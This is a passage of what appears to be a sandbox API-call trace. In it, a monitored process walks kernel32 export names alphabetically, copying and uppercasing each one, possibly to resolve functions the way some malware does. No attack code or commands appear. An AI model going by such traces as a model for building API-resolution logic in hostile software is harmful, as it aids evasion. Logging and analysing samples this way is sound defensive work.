(lpString="CLOSETHREADPOOLWORK") returned 19 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.082] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.083] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.083] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.083] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.083] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.083] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.083] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.083] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.083] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.083] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.083] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.083] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.083] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.083] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.083] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.083] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.083] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.083] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.083] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.083] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.084] lstrlenA (lpString="COPYFILEA") returned 9 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.084] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.084] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.084] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.084] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.084] lstrlenA (lpString="COPYFILEW") returned 9 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.084] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.084] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.084] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.084] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.084] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.084] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.084] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.084] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.084] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.084] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.084] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.084] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.085] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.085] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.085] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.085] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.085] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.085] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.085] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.085] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.085] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.085] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.085] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.085] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.085] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.085] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.085] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.085] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.085] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.085] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.085] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.086] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.086] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.086] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.086] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.086] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.086] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.086] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.086] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.086] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.086] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.086] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.086] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.086] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.086] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.086] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.086] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.086] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.086] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.086] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.087] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.087] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.087] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.087] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.087] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.087] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.087] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.087] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.087] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.087] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.087] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.087] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.087] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.087] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.087] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.087] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.087] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.087] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.087] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.087] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.088] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.088] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.088] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.088] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.088] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.088] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.088] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.088] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.088] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.088] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.088] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.088] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.088] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.088] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.088] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.088] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.088] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.089] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.089] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.089] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.089] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.089] lstrlenA (lpString="DELETEATOM") returned 10 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.089] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.089] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.089] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.089] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.089] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.089] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.089] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.089] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.089] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.089] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.089] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.089] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.090] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.090] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: 